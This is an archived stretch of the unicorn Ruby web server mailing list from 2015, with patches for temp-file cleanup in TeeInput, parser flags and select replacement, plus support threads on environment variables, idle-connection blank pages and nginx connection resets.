index b3f8afe..6748a2f 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -3,8 +3,8 @@ require "raindrops"
 
 # This class and its members can be considered a stable interface
 # and will not change in a backwards-incompatible fashion between
-# releases of \Unicorn.  Knowledge of this class is generally not
-# not needed for most users of \Unicorn.
+# releases of unicorn.  Knowledge of this class is generally not
+# not needed for most users of unicorn.
 #
 # Some users may want to access it in the before_fork/after_fork hooks.
 # See the Unicorn::Configurator RDoc for examples.
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [ANN] unicorn 5.0.0.pre2 - another prerelease!
  @ 2015-07-06 21:41  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-06 21:41 UTC (permalink / raw)
  To: unicorn-public

There is a minor TCP socket options are now applied to inherited
sockets, and we have native support for inheriting sockets from
systemd (by emulating the sd_listen_fds(3) function).

Dynamic changes in the application to Rack::Utils::HTTP_STATUS
codes is now supported, so you can use your own custom status
lines.

Ruby 2.2 and later is now favored for performance.
Optimizations by using constants which made sense in earlier
versions of Ruby are gone: so users of old Ruby versions
will see performance regressions.  Ruby 2.2 users should
see the same or better performance, and we have less code
as a result.

* doc: update some invalid URLs
* apply TCP socket options on inherited sockets
* reflect changes in Rack::Utils::HTTP_STATUS_CODES
* reduce constants and optimize for Ruby 2.2
* http_response: reduce size of multi-line header path
* emulate sd_listen_fds for systemd support
* test/unit/test_response.rb: compatibility with older test-unit

This also includes all changes in unicorn 5.0.0.pre1:

http://bogomips.org/unicorn-public/m/20150615225652.GA16164@dcvr.yhbt.net.html

-- 
EW

^ permalink raw reply	[relevance 3%]

* Re: Unicorn returns blank page after no use
  @ 2015-07-01 17:30  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-01 17:30 UTC (permalink / raw)
  To: Farjad Adamjee; +Cc: unicorn-public

Farjad Adamjee <fadamjee@vailsys.com> wrote:
> Hello,
> 
> I am not sure if this is the correct place for this, I have googled
> around to see if anyone else has encountered such an issue, but I
> did not find anything.

This is the correct place :)  Plain-text email is the only way I
handle support for ease-of-archival and distribution.

> I am having this issue where after a period of time of no use (on
> beta [production] environment), maybe 12 hours or so, the unicorn
> process sleeps. When I go and re-request the page, it returns blank.

This sounds like a database (or any other persistent connection
backend) connection expiring due to an idle timeout.

This could also be a firewall/router timeout problem between the
server running unicorn and the database host.

Tony experienced this last year:
http://bogomips.org/unicorn-public/m/CAKM1sPNRsES6H6ByK6bO9Djwa8WvYV6HJ-rEaHopRUYBVFfuhg@mail.gmail.com

You can confirm by running lsof on a worker processes to look for
open sockets.  In case the connection loss isn't noticed by the
OS, use strace (or any other similar syscall tracer for your OS)
instead and watch connection activity.

With strace (or similar) knock yourself down to one worker
process via SIGTTOU to the master to ensure you're always tracing
the correct one.

> I am using Apache proxy to Unicorn.

By the way, this is not recommended for slow clients.
nginx (Open Source edition) is currently the only supported proxy.

>   # Using this method we get 0 downtime deploys.
>   defined?(ActiveRecord::Base) and
> ActiveRecord::Base.connection.disconnect!
>   defined?(OathKeeper) and OathKeeper.disconnect!

I suggest disabling any idle timeout you might have, enabling TCP
keepalive and enabling reconnects (see AR and your database driver
documentation).  Worst case (firewall/router problem you can't
fix via configuration), is to send a request to unicorn every
few minutes/hours to keep things going.

Perhaps OathKeeper has the same problem, too...
I've never heard of it until now.

^ permalink raw reply	[relevance 2%]

* Re: TAN: Ragel now maintained by Colm networks
  2015-06-26 19:46  2% TAN: Ragel now maintained by Colm networks Eric Wong
@ 2015-06-26 21:03  0% ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-06-26 21:03 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Sad news to hear companies that don't understand free software taking
maintainership of good free software :(

Maybe the best would be to maintain a fork of it...

cheers,
bráulio

On Fri, Jun 26, 2015 at 4:46 PM, Eric Wong <e@80x24.org> wrote:
> As most of you know, unicorn has always used Ragel for HTTP
> parsing (inherited from Mongrel).
>
> For the most part, Ragel works great and does not need much
> maintenance.  I made some changes to work with the Ragel 5-to-6
> transition for Mongrel (pre-unicorn) and that was it.
>
> Since I mainly use Ragel from the Debian package nowadays,
> I missed this bit of news when it was posted 2014-10-24.
>
> http://www.colm.net/ragel-now-maintained-by-colm-networks/
>
> | As of October 2014, Ragel will be maintained by Colm Networks.
> | This is a new consulting company founded by Dr. Adrian D.
> | Thurston.
>
> (ed: Adrian Thurston is the original author of Ragel)
>
> | Since we cannot operate in the open, the git repository for
> | Ragel  will no longer be available. The project will be
> | published as release (and pre-release) tarballs only. On the
> | upside, Ragel will get much more attention.
>
> *Sigh* I guess we'll need to diff release tarballs from now on...
>
> I'm not very knowledgeable in C++, so any extra help auditing Ragel
> changes would be greatly appreciated.
>
> | The license will remain the same: GPLv2 with an exception for
> | the generated code derived from Ragel source.
>
> OK, at least that is good to hear.
>
> Fwiw, the ragel-users mailing list (where I lurked) closed in
> July 2014, too.
>
> Anyways, I still love Ragel as a tool/language and have used it
> in other projects.  For now, it seems to work, but I'm hesitant
> to start new projects using it.
>

^ permalink raw reply	[relevance 0%]

* TAN: Ragel now maintained by Colm networks
@ 2015-06-26 19:46  2% Eric Wong
  2015-06-26 21:03  0% ` Bráulio Bhavamitra
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-06-26 19:46 UTC (permalink / raw)
  To: unicorn-public

As most of you know, unicorn has always used Ragel for HTTP
parsing (inherited from Mongrel).

For the most part, Ragel works great and does not need much
maintenance.  I made some changes to work with the Ragel 5-to-6
transition for Mongrel (pre-unicorn) and that was it.

Since I mainly use Ragel from the Debian package nowadays,
I missed this bit of news when it was posted 2014-10-24.

http://www.colm.net/ragel-now-maintained-by-colm-networks/

| As of October 2014, Ragel will be maintained by Colm Networks. 
| This is a new consulting company founded by Dr. Adrian D.
| Thurston.

(ed: Adrian Thurston is the original author of Ragel)

| Since we cannot operate in the open, the git repository for
| Ragel  will no longer be available. The project will be
| published as release (and pre-release) tarballs only. On the
| upside, Ragel will get much more attention.

*Sigh* I guess we'll need to diff release tarballs from now on...

I'm not very knowledgeable in C++, so any extra help auditing Ragel
changes would be greatly appreciated.

| The license will remain the same: GPLv2 with an exception for
| the generated code derived from Ragel source.

OK, at least that is good to hear.

Fwiw, the ragel-users mailing list (where I lurked) closed in
July 2014, too.

Anyways, I still love Ragel as a tool/language and have used it
in other projects.  For now, it seems to work, but I'm hesitant
to start new projects using it.

^ permalink raw reply	[relevance 2%]

* [PATCH 2/2] http: move response_start_sent into the C ext
  @ 2015-06-06  1:58  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-06-06  1:58 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

Combined with the previous commit to eliminate the `@socket'
instance variable, this eliminates the last instance variable
in the Unicorn::HttpRequest class.

Eliminating the last instance variable avoids the creation of a
internal hash table used for implementing the "generic" instance
variables found in non-pure-Ruby classes.  Method entry overhead
remains the same.

While this change doesn't do a whole lot for unicorn memory usage
where the HttpRequest is a singleton, it helps other HTTP servers
which rely on this code where thousands of clients may be connected.
---
 ext/unicorn_http/unicorn_http.rl | 26 +++++++++++++++++++++++---
 lib/unicorn/http_request.rb      |  4 +---
 test/unit/test_http_parser_ng.rb | 11 +++++++++++
 3 files changed, 35 insertions(+), 6 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index bd45dd0..a5f069d 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -25,6 +25,7 @@ void init_unicorn_httpdate(void);
 #define UH_FL_KAVERSION 0x80
 #define UH_FL_HASHEADER 0x100
 #define UH_FL_TO_CLEAR 0x200
+#define UH_FL_RESSTART 0x400 /* for check_client_connection */
 
 /* all of these flags need to be set for keepalive to be supported */
 #define UH_FL_KEEPALIVE (UH_FL_KAVERSION | UH_FL_REQEOF | UH_FL_HASHEADER)
@@ -60,7 +61,7 @@ struct http_parser {
   } len;
 };
 
-static ID id_set_backtrace, id_response_start_sent;
+static ID id_set_backtrace;
 
 #ifdef HAVE_RB_HASH_CLEAR /* Ruby >= 2.0 */
 #  define my_hash_clear(h) (void)rb_hash_clear(h)
@@ -597,7 +598,6 @@ static VALUE HttpParser_clear(VALUE self)
 
   http_parser_init(hp);
   my_hash_clear(hp->env);
-  rb_ivar_set(self, id_response_start_sent, Qfalse);
 
   return self;
 }
@@ -880,6 +880,25 @@ static VALUE HttpParser_filter_body(VALUE self, VALUE dst, VALUE src)
   return src;
 }
 
+static VALUE HttpParser_rssset(VALUE self, VALUE boolean)
+{
+  struct http_parser *hp = data_get(self);
+
+  if (RTEST(boolean))
+    HP_FL_SET(hp, RESSTART);
+  else
+    HP_FL_UNSET(hp, RESSTART);
+
+  return boolean; /* ignored by Ruby anyways */
+}
+
+static VALUE HttpParser_rssget(VALUE self)
+{
+  struct http_parser *hp = data_get(self);
+
+  return HP_FL_TEST(hp, RESSTART) ? Qtrue : Qfalse;
+}
+
 #define SET_GLOBAL(var,str) do { \
   var = find_common_field(str, sizeof(str) - 1); \
   assert(!NIL_P(var) && "missed global field"); \
@@ -914,6 +933,8 @@ void Init_unicorn_http(void)
   rb_define_method(cHttpParser, "next?", HttpParser_next, 0);
   rb_define_method(cHttpParser, "buf", HttpParser_buf, 0);
   rb_define_method(cHttpParser, "env", HttpParser_env, 0);
+  rb_define_method(cHttpParser, "response_start_sent=", HttpParser_rssset, 1);
+  rb_define_method(cHttpParser, "response_start_sent", HttpParser_rssget, 0);
 
   /*
    * The maximum size a single chunk when using chunked transfer encoding.
@@ -939,7 +960,6 @@ void Init_unicorn_http(void)
   SET_GLOBAL(g_content_length, "CONTENT_LENGTH");
   SET_GLOBAL(g_http_connection, "CONNECTION");
   id_set_backtrace = rb_intern("set_backtrace");
-  id_response_start_sent = rb_intern("@response_start_sent");
   init_unicorn_httpdate();
 
 #ifndef HAVE_RB_HASH_CLEAR
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index f5c6b5b..9339bce 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -25,8 +25,6 @@ class Unicorn::HttpParser
   RACK_HIJACK_IO = "rack.hijack_io".freeze
   NULL_IO = StringIO.new("")
 
-  attr_accessor :response_start_sent
-
   # :stopdoc:
   # A frozen format for this is about 15% faster
   # Drop these frozen strings when Ruby 2.2 becomes more prevalent,
@@ -92,7 +90,7 @@ class Unicorn::HttpParser
 
     # detect if the socket is valid by writing a partial response:
     if @@check_client_connection && headers?
-      @response_start_sent = true
+      self.response_start_sent = true
       HTTP_RESPONSE_START.each { |c| socket.write(c) }
     end
 
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index efd82e1..d186f5a 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -34,6 +34,17 @@ class HttpParserNgTest < Test::Unit::TestCase
     assert_equal false, @parser.response_start_sent
   end
 
+  def test_response_start_sent
+    assert_equal false, @parser.response_start_sent, "default is false"
+    @parser.response_start_sent = true
+    assert_equal true, @parser.response_start_sent
+    @parser.response_start_sent = false
+    assert_equal false, @parser.response_start_sent
+    @parser.response_start_sent = true
+    @parser.clear
+    assert_equal false, @parser.response_start_sent
+  end
+
   def test_connection_TE
     @parser.buf << "GET / HTTP/1.1\r\nHost: example.com\r\nConnection: TE\r\n"
     @parser.buf << "TE: trailers\r\n\r\n"
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [PATCH] favor kgio_wait_readable for single FD over select
@ 2015-05-07 22:16  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-05-07 22:16 UTC (permalink / raw)
  To: unicorn-public

kgio_wait_readable is superior for single FDs in that it may use the
ppoll syscall on Linux via Ruby, making it immune to the slowdown
high FDs with select() and the array allocations enforced by the
Ruby wrapper interface.

Note: IO#wait in the io/wait stdlib has the same effect, but as of
2.2 still needlessly checks the FIONREAD ioctl.  So avoid needing to
force a new require on users which also incur shared object loading
costs.  The longer term plan is to rely entirely on Ruby IO
primitives entirely and drop kgio, but that won't happen until we
can depend on Ruby 2.3 for exception-free accept_nonblock
(which will be released December 2015).
---
 lib/unicorn/http_server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index a726c91..82747b8 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -369,7 +369,7 @@ class Unicorn::HttpServer
 
   # wait for a signal hander to wake us up and then consume the pipe
   def master_sleep(sec)
-    IO.select([ @self_pipe[0] ], nil, nil, sec) or return
+    @self_pipe[0].kgio_wait_readable(sec) or return
     # 11 bytes is the maximum string length which can be embedded within
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: TeeInput leaks file handles/space
  2015-04-24  3:08  0%         ` Eric Wong
@ 2015-04-24 11:56  0%           ` Mulvaney, Mike
  0 siblings, 0 replies; 200+ results
From: Mulvaney, Mike @ 2015-04-24 11:56 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

That sounds great. Thanks for fixing this so fast!

-Mike

> On Apr 23, 2015, at 11:08 PM, Eric Wong <e@80x24.org> wrote:
> 
> "Mulvaney, Mike" <MMulvaney@bna.com> wrote:
>> I think it would be reasonable to fix this for Rack 1.6+.  It won't
>> cause any problems for Rack 1.5 users, right?  The environment
>> variable gets set and then ignored, so the app would behave exactly
>> the same way.  If they want to use the new cleanup code, they can
>> upgrade rack.
> 
> Right, this only affects 1.6 users.  1.5 users will need to upgrade for
> this.

^ permalink raw reply	[relevance 0%]

* Re: TeeInput leaks file handles/space
  2015-04-22 19:24  2%       ` Mulvaney, Mike
@ 2015-04-24  3:08  0%         ` Eric Wong
  2015-04-24 11:56  0%           ` Mulvaney, Mike
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-04-24  3:08 UTC (permalink / raw)
  To: Mulvaney, Mike; +Cc: unicorn-public@bogomips.org

"Mulvaney, Mike" <MMulvaney@bna.com> wrote:
> I think it would be reasonable to fix this for Rack 1.6+.  It won't
> cause any problems for Rack 1.5 users, right?  The environment
> variable gets set and then ignored, so the app would behave exactly
> the same way.  If they want to use the new cleanup code, they can
> upgrade rack.

Right, this only affects 1.6 users.  1.5 users will need to upgrade for
this.

^ permalink raw reply	[relevance 0%]

* Re: Unicorn, environment variables, start and reload
  @ 2015-04-23  9:29  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-04-23  9:29 UTC (permalink / raw)
  To: Jérémy Lecour; +Cc: unicorn-public

Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> Hi,
> 
> For some time I've been using Unicorn to serve Rails applications.
> 
> I've been increasingly relying on environment variables to set various
> password and configuration bits outside of the application's code.
> 
> For that I've been using the "dotenv" gem that load a `.env` file into
> the ENV hash. It's great and really useful in development mode, but
> it's not a best practice to use it in production. Here is what Brandon
> Keepers (maintainer of Dotenv) says about this :
> 
> > One of the reasons I don't advocate for using dotenv in production is because it loads the environment variables within the ruby process, which makes it very difficult to track which variables were previously set and which were loaded by dotenv. If you set these variables in the environment of your server (/etc/environment, /etc/profile, etc) then unicorn reloading will just work.

Right, and some of these envs might not work unless they're set before
Ruby VM initialization.  By the time the process can run Ruby code, it's
too late to setup most malloc behavior in any program or GC tuning for
Ruby.

I think most of the MRI-specific RUBY_* vars and most enviroment
variables used for any malloc tuning will fall into this group.

> So I was wondering what would be the correct way to have environment
> variables available in the Ruby process, up-to-date when the Unicorn
> process is started and reloaded too (with USR2).
> 
> And there is also the case of various shell initializations
> (login/non-login, interactive/non-interactive) and supervisors like
> Monit that strip the environment to a minumum before executing the
> start/stop commands.

I set them in an init script (or whatever startup script/system I use).
I might also use "env -i" to clobber any existing environment if
I'm feeling really thorough, but usually I don't.

Most versions of Linux allow checking the environment by inspecting
/proc/$PID/environ  (tr '\0' '\n' </proc/$PID/environ to convert
null-terminated to newlines).  This may not reflect changes done inside
the process, though, so maybe have a private endpoint dump the contents
of ENV.

> I understand that I can do something like this on start :
> 
>     $ source ~/my/app/.env && unicorn [...]
> 
> But what about the reload situation ?

You can change the ENV (or run any other Ruby) in the config file, but
most might not take effect until a new process is spawned (same with
dotenv).  This means you may need USR2 for it to take effect.

I definitely keep ENV changes in the Ruby config file synched with
what's in the init script (and both in version control).

^ permalink raw reply	[relevance 2%]

* RE: TeeInput leaks file handles/space
  @ 2015-04-22 19:24  2%       ` Mulvaney, Mike
  2015-04-24  3:08  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Mulvaney, Mike @ 2015-04-22 19:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

Oh yeah, I like that even better.

The app I'm currently working on is using Rails 4.1 and Rack 1.5.x.  I don't have any problem with upgrading rack, I just haven't done it yet.

I think it would be reasonable to fix this for Rack 1.6+.  It won't cause any problems for Rack 1.5 users, right?  The environment variable gets set and then ignored, so the app would behave exactly the same way.  If they want to use the new cleanup code, they can upgrade rack.

-Mike

-----Original Message-----
From: Eric Wong [mailto:e@80x24.org] 
Sent: Wednesday, April 22, 2015 3:16 PM
To: Mulvaney, Mike
Cc: unicorn-public@bogomips.org
Subject: Re: TeeInput leaks file handles/space

"Mulvaney, Mike" <MMulvaney@bna.com> wrote:
> That looks reasonable to me -- this way you would only have one file 
> still open per process at a maximum, right?  I think that's a good 
> solution.

Right.

Below is a barely-tested alternative patch for Rack::TempfileReaper, for Rack 1.6+ users only.  I'm not sure how prevalent 1.6+ was only released in December 2014...

It's more standardized, but maybe Rack 1.6 isn't prevalent enough, yet.
What do you think?

(Sorry, in a rush, no commit message, yet)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb index 637c583..7f6baa2 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -28,13 +28,20 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # for Rack::TempfileReaper in rack 1.6+  def new_tmpio
+    tmpio = Unicorn::TmpIO.new
+    (@parser.env['rack.tempfiles'] ||= []) << tmpio
+    tmpio
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb index c97979a..db88ed3 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -21,4 +21,7 @@ class Unicorn::TmpIO < File
     fp.sync = true
     fp
   end
+
+  # pretend we're Tempfile for Rack::TempfileReaper  alias close! close
 end

^ permalink raw reply	[relevance 2%]

* RE: TeeInput leaks file handles/space
  2015-04-22 18:38  2% ` Eric Wong
@ 2015-04-22 19:10  2%   ` Mulvaney, Mike
    0 siblings, 1 reply; 200+ results
From: Mulvaney, Mike @ 2015-04-22 19:10 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

That looks reasonable to me -- this way you would only have one file still open per process at a maximum, right?  I think that's a good solution.

Thanks,

-Mike

-----Original Message-----
From: Eric Wong [mailto:e@80x24.org] 
Sent: Wednesday, April 22, 2015 2:38 PM
To: Mulvaney, Mike
Cc: unicorn-public@bogomips.org
Subject: Re: TeeInput leaks file handles/space

How about this patch to tee_input?  It won't pollute the common code path, at least, and unicorn won't support multiple clients/tee_inputs

I might release 4.8.4 with this, but it does break behavior for hijackers, but 5.0 will have lots of tiny internal incompatibilities for corner-cases anyways.
-----------------------------8<---------------------------
Subject: [PATCH] tee_input: close temporary file upon allocating the next

This prevents unicorn from using up too much space due to large uploads while not polluting the common code path of most clients.

This is only fine for unicorn since unicorn itself will never support multiple clients in the same process.

This may break users of rack.hijack (are there any on unicorn?), but they can call IO#dup on the file if they're relying on hijack and server internals like that.

In a perfect world, we could even truncate and rewind to avoid the FD/inode deallocation/allocations in the kernel; but that would break any IO#dup workarounds used by hijackers.

Notes: StringIO#close does not release memory immediately, so there's no point in calling it here

Ref: <CY1PR0301MB078011EB5A22B733EB222A45A4EE0@CY1PR0301MB0780.namprd03.prod.outlook.com>
Reported-by: Mike Mulvaney <MMulvaney@bna.com>
---
 lib/unicorn/tee_input.rb | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb index 637c583..6ff8210 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -9,12 +9,17 @@
 # strict interpretation of Rack::Lint::InputWrapper functionality and  # will not support any deviations from it.
 #
+# This is an internal class meant for Unicorn only, any use beyond # 
+what appears in the Rack specificiation is unsupported and subject # to 
+change.
+#
 # When processing uploads, Unicorn exposes a TeeInput object under  # "rack.input" of the Rack environment.
 class Unicorn::TeeInput < Unicorn::StreamInput
   # The maximum size (in +bytes+) to buffer in memory before
   # resorting to a temporary file.  Default is 112 kilobytes.
   @@client_body_buffer_size = Unicorn::Const::MAX_BODY
+  @@cur_tmpio = nil
 
   # sets the maximum size of request bodies to buffer in memory,
   # amounts larger than this are buffered to the filesystem @@ -28,13 +33,21 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # This class is essentially a singleton since unicorn will never 
+ support  # multiple clients; and we don't want to pollute the common 
+ code path  # with extra ivars/state  def new_tmpio
+    @@cur_tmpio.close if @@cur_tmpio
+    @@cur_tmpio = Unicorn::TmpIO.new
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
--
EW

^ permalink raw reply	[relevance 2%]

* Re: TeeInput leaks file handles/space
  @ 2015-04-22 18:38  2% ` Eric Wong
  2015-04-22 19:10  2%   ` Mulvaney, Mike
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-04-22 18:38 UTC (permalink / raw)
  To: Mulvaney, Mike; +Cc: unicorn-public@bogomips.org

How about this patch to tee_input?  It won't pollute the common code
path, at least, and unicorn won't support multiple clients/tee_inputs

I might release 4.8.4 with this, but it does break behavior for
hijackers, but 5.0 will have lots of tiny internal incompatibilities
for corner-cases anyways.
-----------------------------8<---------------------------
Subject: [PATCH] tee_input: close temporary file upon allocating the next

This prevents unicorn from using up too much space due to large
uploads while not polluting the common code path of most clients.

This is only fine for unicorn since unicorn itself will never
support multiple clients in the same process.

This may break users of rack.hijack (are there any on unicorn?), but
they can call IO#dup on the file if they're relying on hijack and
server internals like that.

In a perfect world, we could even truncate and rewind to avoid the
FD/inode deallocation/allocations in the kernel; but that would
break any IO#dup workarounds used by hijackers.

Notes: StringIO#close does not release memory immediately, so
there's no point in calling it here

Ref: <CY1PR0301MB078011EB5A22B733EB222A45A4EE0@CY1PR0301MB0780.namprd03.prod.outlook.com>
Reported-by: Mike Mulvaney <MMulvaney@bna.com>
---
 lib/unicorn/tee_input.rb | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 637c583..6ff8210 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -9,12 +9,17 @@
 # strict interpretation of Rack::Lint::InputWrapper functionality and
 # will not support any deviations from it.
 #
+# This is an internal class meant for Unicorn only, any use beyond
+# what appears in the Rack specificiation is unsupported and subject
+# to change.
+#
 # When processing uploads, Unicorn exposes a TeeInput object under
 # "rack.input" of the Rack environment.
 class Unicorn::TeeInput < Unicorn::StreamInput
   # The maximum size (in +bytes+) to buffer in memory before
   # resorting to a temporary file.  Default is 112 kilobytes.
   @@client_body_buffer_size = Unicorn::Const::MAX_BODY
+  @@cur_tmpio = nil
 
   # sets the maximum size of request bodies to buffer in memory,
   # amounts larger than this are buffered to the filesystem
@@ -28,13 +33,21 @@ class Unicorn::TeeInput < Unicorn::StreamInput
     @@client_body_buffer_size
   end
 
+  # This class is essentially a singleton since unicorn will never support
+  # multiple clients; and we don't want to pollute the common code path
+  # with extra ivars/state
+  def new_tmpio
+    @@cur_tmpio.close if @@cur_tmpio
+    @@cur_tmpio = Unicorn::TmpIO.new
+  end
+
   # Initializes a new TeeInput object.  You normally do not have to call
   # this unless you are writing an HTTP server.
   def initialize(socket, request)
     @len = request.content_length
     super
     @tmp = @len && @len <= @@client_body_buffer_size ?
-           StringIO.new("") : Unicorn::TmpIO.new
+           StringIO.new("") : new_tmpio
   end
 
   # :call-seq:
-- 
EW

^ permalink raw reply related	[relevance 2%]

* Re: $USER and $HOME shell variables not set
  2015-03-27 14:32  3% $USER and $HOME shell variables not set Russell Jennings
@ 2015-03-27 18:34  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-27 18:34 UTC (permalink / raw)
  To: Russell Jennings; +Cc: unicorn-public

Russell Jennings <violentpurr@gmail.com> wrote:
> Hello,
> 
> I am running into some issues with these variables being set - since I
> am spawning a script from a unicorn worker (via a rails controller) I
> figured I’d ask here. 
> 
> Here is the stackoverflow with the full background:
> http://stackoverflow.com/questions/29233181/why-is-envhome-nil-in-my-rake-task
> 
> in short: does unicorn have anything to do with $HOME or $USER not
> being defined?

Nope, unicorn itself does not change these variables.  We only set
UNICORN_FD (for SIGUSR2 upgrades), PWD (if working_directory is used).

Your init system may change users and clobber these options via
sudo/su/env and similar wrappers, so I think it has to do with how
you're starting unicorn.  If you're using sudo anywhere, the env_*
options from the sudoers files will also affect which envs get
clobbered/preserved/added.

> From what I can tell, that its unicorn is the only
> thing thats different versus running the same ruby via a rails console
> (which does indeed set those shell variables correctly)
> 
> in no mans land, so any hep or insight would be greatly appreciated. 

Can you add something to log the contents of ENV.inspect to
a log file.  Perhaps something like:

	Rails.logger.debug("env: #{ENV.inspect}")

It would also be helpful to show the snippet of code from where you're
running Rake in case you're accidentally setting an option wrong.


Under Linux, you can also inspect the original environment of any running
process from /proc/$PID/environ  In most cases/kernel versions, it won't
keep up with env changes once a process is running.
I use tr to replace '\0' with '\n' (newline) to help with readability

	tr '\0' '\n' </proc/$PID/environ

^ permalink raw reply	[relevance 0%]

* $USER and $HOME shell variables not set
@ 2015-03-27 14:32  3% Russell Jennings
  2015-03-27 18:34  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Russell Jennings @ 2015-03-27 14:32 UTC (permalink / raw)
  To: unicorn-public

Hello,

I am running into some issues with these variables being set - since I am spawning a script from a unicorn worker (via a rails controller) I figured I’d ask here. 

Here is the stackoverflow with the full background:
http://stackoverflow.com/questions/29233181/why-is-envhome-nil-in-my-rake-task

in short: does unicorn have anything to do with $HOME or $USER not being defined? From what I can tell, that its unicorn is the only thing thats different versus running the same ruby via a rails console (which does indeed set those shell variables correctly)

in no mans land, so any hep or insight would be greatly appreciated. 

Thanks,
Russell

^ permalink raw reply	[relevance 3%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-25 10:12  3%                 ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-25 10:12 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Mar 24, 2015 at 11:55 PM, Eric Wong <e@80x24.org> wrote:
> 
> > Actually, are you getting 502 errors returned from nginx in this case?
> > That would not be harmless.  I suggest ensuring rack.input is
> > fully-drained if that is the case (perhaps using PrereadInput).
> 
> No, they're all 200 responses with a zero-length body size.  It's the
> first time I'd ever seen such a combination of symptoms.

OK, thanks for the update.

I was wondering if including a Unicorn::PostreadInput middleware should
be introduced to quiet your logs.  It should have the same effect as
PrereadInput, but should provide better performance in the common case
and also be compatible with "rewindable_input false" users.

class Unicorn::PostreadInput
  def initialize(app)
    @app = app
  end

  def call(env)
    input = env["rack.input"] # save it here, in case the app reassigns it
    @app.call(env)
  ensure
    # Ensure the HTTP request is entirely read off the socket even
    # if the app aborts early.  This should prevent nginx from
    # complaining about ECONNRESET errors.
    unless env["rack.hijack_io"]
      buf = ''
      true while input.read(16384, buf)
      buf.clear
    end
  end
end

(totally untested)

"Postread" doesn't sound quite right, though...

^ permalink raw reply	[relevance 3%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-24 22:54  3% ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-24 22:54 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> We have an nginx 1.6.2 proxy in front of a Unicorn 4.8.3 server that
> is frequently reporting the following error:
> 
> 2015/03/24 01:46:01 [error] 11217#0: *872231 readv() failed (104:
> Connection reset by peer) while reading upstream
> 
> The interesting things are:
> 
> 1) The upstream is a Unix domain socket (to which Unicorn is bound)
> 2) Unicorn isn't reporting that a child died in the error log (and I
> verified their lifetimes with ps(1))
> 
> Any hints as to what we should look for?

What changed recently with your setup?

Which OS/kernel version + vendor version?

Since you've been around a while, I take it this is only a recent issue?

